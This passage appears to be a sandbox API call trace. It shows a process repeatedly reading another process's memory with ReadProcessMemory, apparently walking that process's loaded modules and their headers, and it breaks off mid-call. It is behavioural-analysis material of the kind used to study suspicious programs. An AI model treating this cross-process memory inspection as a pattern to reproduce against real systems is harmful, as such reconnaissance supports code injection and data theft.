[0018.524] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.524] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ae30 [0018.524] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x53ec8, lpBuffer=0x9ae30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ae30*, lpNumberOfBytesRead=0x0) returned 1 [0018.525] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefca80000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.525] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.525] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.525] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ac20 [0018.525] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefca800f0, lpBuffer=0x9ac20, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.525] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.525] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.525] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac40 [0018.525] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefca800f0, lpBuffer=0x9ac40, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac40*, lpNumberOfBytesRead=0x0) returned 1 [0018.525] LocalFree (hMem=0x9ac20) returned 0x0 [0018.525] LocalFree (hMem=0x9ac40) returned 0x0 [0018.525] LocalFree (hMem=0x9ae30) returned 0x0 [0018.525] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x677d0, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.525] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.525] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.525] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x9ae30 [0018.525] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x677a8, lpBuffer=0x9ae30, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ae30*, lpNumberOfBytesRead=0x0) returned 1 [0018.525] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc910000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.525] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.525] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.525] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ac20 [0018.525] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc9100e8, lpBuffer=0x9ac20, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.525] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.525] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.525] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac40 [0018.525] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc9100e8, lpBuffer=0x9ac40, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac40*, lpNumberOfBytesRead=0x0) returned 1 [0018.525] LocalFree (hMem=0x9ac20) returned 0x0 [0018.525] LocalFree (hMem=0x9ac40) returned 0x0 [0018.526] LocalFree (hMem=0x9ae30) returned 0x0 [0018.526] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x678c0, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.526] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.526] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.526] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ae30 [0018.526] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x67758, lpBuffer=0x9ae30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ae30*, lpNumberOfBytesRead=0x0) returned 1 [0018.526] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefef00000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.526] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.526] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.526] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ac20 [0018.526] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefef000e8, lpBuffer=0x9ac20, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.526] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.526] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.526] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac40 [0018.526] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefef000e8, lpBuffer=0x9ac40, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac40*, lpNumberOfBytesRead=0x0) returned 1 [0018.526] LocalFree (hMem=0x9ac20) returned 0x0 [0018.526] LocalFree (hMem=0x9ac40) returned 0x0 [0018.526] LocalFree (hMem=0x9ae30) returned 0x0 [0018.526] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x675a0, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.526] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.526] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.526] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ae30 [0018.526] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x67578, lpBuffer=0x9ae30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ae30*, lpNumberOfBytesRead=0x0) returned 1 [0018.526] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcba0000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.526] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.526] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.526] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ac20 [0018.526] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcba00e8, lpBuffer=0x9ac20, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.527] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.527] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.527] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac40 [0018.527] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcba00e8, lpBuffer=0x9ac40, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac40*, lpNumberOfBytesRead=0x0) returned 1 [0018.527] LocalFree (hMem=0x9ac20) returned 0x0 [0018.527] LocalFree (hMem=0x9ac40) returned 0x0 [0018.527] LocalFree (hMem=0x9ae30) returned 0x0 [0018.527] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x679b0, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.527] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.527] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.527] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x98330 [0018.527] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x67528, lpBuffer=0x98330, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x98330*, lpNumberOfBytesRead=0x0) returned 1 [0018.527] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe780000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.527] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.527] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.527] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ae30 [0018.527] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe7800e0, lpBuffer=0x9ae30, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ae30*, lpNumberOfBytesRead=0x0) returned 1 [0018.527] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.527] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.527] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac20 [0018.527] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefe7800e0, lpBuffer=0x9ac20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.527] LocalFree (hMem=0x9ae30) returned 0x0 [0018.527] LocalFree (hMem=0x9ac20) returned 0x0 [0018.527] LocalFree (hMem=0x98330) returned 0x0 [0018.527] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x67aa0, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.527] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.527] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.527] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x9ae30 [0018.527] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x676b8, lpBuffer=0x9ae30, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ae30*, lpNumberOfBytesRead=0x0) returned 1 [0018.528] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76b70000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.528] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.528] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.528] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ac20 [0018.528] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76b700f8, lpBuffer=0x9ac20, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.528] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.528] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.528] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac40 [0018.528] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x76b700f8, lpBuffer=0x9ac40, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac40*, lpNumberOfBytesRead=0x0) returned 1 [0018.528] LocalFree (hMem=0x9ac20) returned 0x0 [0018.528] LocalFree (hMem=0x9ac40) returned 0x0 [0018.528] LocalFree (hMem=0x9ae30) returned 0x0 [0018.528] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x67b90, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.528] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.528] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.528] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x9ae30 [0018.528] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x67708, lpBuffer=0x9ae30, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ae30*, lpNumberOfBytesRead=0x0) returned 1 [0018.528] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefeb00000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.528] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.528] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.528] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9ac20 [0018.528] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefeb000f0, lpBuffer=0x9ac20, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.528] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.528] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.528] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac40 [0018.528] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefeb000f0, lpBuffer=0x9ac40, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac40*, lpNumberOfBytesRead=0x0) returned 1 [0018.528] LocalFree (hMem=0x9ac20) returned 0x0 [0018.528] LocalFree (hMem=0x9ac40) returned 0x0 [0018.528] LocalFree (hMem=0x9ae30) returned 0x0 [0018.528] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x67c80, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.529] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.529] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.529] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x9d000 [0018.529] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x661c8, lpBuffer=0x9d000, nSize=0x10, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d000*, lpNumberOfBytesRead=0x0) returned 1 [0018.529] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefeaf0000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.529] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.529] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.529] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9d020 [0018.529] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefeaf00e0, lpBuffer=0x9d020, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d020*, lpNumberOfBytesRead=0x0) returned 1 [0018.529] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.529] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.529] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac20 [0018.529] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefeaf00e0, lpBuffer=0x9ac20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.529] LocalFree (hMem=0x9d020) returned 0x0 [0018.529] LocalFree (hMem=0x9ac20) returned 0x0 [0018.529] LocalFree (hMem=0x9d000) returned 0x0 [0018.529] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x67dc0, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.529] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.529] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.529] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x9d000 [0018.529] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x67d98, lpBuffer=0x9d000, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d000*, lpNumberOfBytesRead=0x0) returned 1 [0018.529] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefec10000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.529] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.529] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.529] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9d020 [0018.529] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefec100e0, lpBuffer=0x9d020, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d020*, lpNumberOfBytesRead=0x0) returned 1 [0018.530] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.530] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.530] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac20 [0018.530] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefec100e0, lpBuffer=0x9ac20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.530] LocalFree (hMem=0x9d020) returned 0x0 [0018.530] LocalFree (hMem=0x9ac20) returned 0x0 [0018.530] LocalFree (hMem=0x9d000) returned 0x0 [0018.530] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x68980, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.530] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.530] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.530] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x9d000 [0018.530] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x68958, lpBuffer=0x9d000, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d000*, lpNumberOfBytesRead=0x0) returned 1 [0018.530] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc850000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.530] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.530] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.530] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9d020 [0018.530] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc8500f0, lpBuffer=0x9d020, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d020*, lpNumberOfBytesRead=0x0) returned 1 [0018.530] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.530] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.530] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac20 [0018.530] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc8500f0, lpBuffer=0x9ac20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.530] LocalFree (hMem=0x9d020) returned 0x0 [0018.530] LocalFree (hMem=0x9ac20) returned 0x0 [0018.530] LocalFree (hMem=0x9d000) returned 0x0 [0018.530] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x69a70, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.530] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.530] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.530] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x98330 [0018.530] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x68b18, lpBuffer=0x98330, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x98330*, lpNumberOfBytesRead=0x0) returned 1 [0018.531] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc830000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.531] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.531] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.531] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9d000 [0018.531] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc8300e8, lpBuffer=0x9d000, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d000*, lpNumberOfBytesRead=0x0) returned 1 [0018.531] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.531] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.531] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac20 [0018.531] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc8300e8, lpBuffer=0x9ac20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.531] LocalFree (hMem=0x9d000) returned 0x0 [0018.531] LocalFree (hMem=0x9ac20) returned 0x0 [0018.531] LocalFree (hMem=0x98330) returned 0x0 [0018.531] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x69b90, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.531] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.531] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.531] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x9d000 [0018.531] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x68ac8, lpBuffer=0x9d000, nSize=0x16, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d000*, lpNumberOfBytesRead=0x0) returned 1 [0018.531] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcd80000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.531] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.531] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.531] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9d020 [0018.531] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcd800e0, lpBuffer=0x9d020, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d020*, lpNumberOfBytesRead=0x0) returned 1 [0018.531] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.531] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.531] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac20 [0018.531] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefcd800e0, lpBuffer=0x9ac20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.531] LocalFree (hMem=0x9d020) returned 0x0 [0018.531] LocalFree (hMem=0x9ac20) returned 0x0 [0018.531] LocalFree (hMem=0x9d000) returned 0x0 [0018.532] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x69c80, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.532] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.532] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.532] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9d000 [0018.532] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x68bb8, lpBuffer=0x9d000, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d000*, lpNumberOfBytesRead=0x0) returned 1 [0018.532] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc7c0000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.532] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.532] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.532] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9d020 [0018.532] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc7c00f0, lpBuffer=0x9d020, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d020*, lpNumberOfBytesRead=0x0) returned 1 [0018.532] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.532] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.532] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac20 [0018.532] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefc7c00f0, lpBuffer=0x9ac20, nSize=0x108, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9ac20*, lpNumberOfBytesRead=0x0) returned 1 [0018.532] LocalFree (hMem=0x9d020) returned 0x0 [0018.532] LocalFree (hMem=0x9ac20) returned 0x0 [0018.532] LocalFree (hMem=0x9d000) returned 0x0 [0018.532] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x69d70, lpBuffer=0x28f6b0, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f6b0*, lpNumberOfBytesRead=0x0) returned 1 [0018.532] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.532] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.532] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x9d000 [0018.532] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x68b68, lpBuffer=0x9d000, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d000*, lpNumberOfBytesRead=0x0) returned 1 [0018.532] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefeec0000, lpBuffer=0x28f580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x28f580*, lpNumberOfBytesRead=0x0) returned 1 [0018.532] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.532] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.533] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x9d020 [0018.533] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefeec00f0, lpBuffer=0x9d020, nSize=0x18, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9d020*, lpNumberOfBytesRead=0x0) returned 1 [0018.533] GetModuleHandleW (lpModuleName="kernel32") returned 0x76c70000 [0018.533] GetProcAddress (hModule=0x76c70000, lpProcName="LocalAlloc") returned 0x76c847c0 [0018.533] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x9ac20 [0018.533] ReadProcessMemory (in: hProcess=0x60, lpBaseAddress=0x7fefeec00f0, lpBuffer=0x9ac20, nSize=0x108, 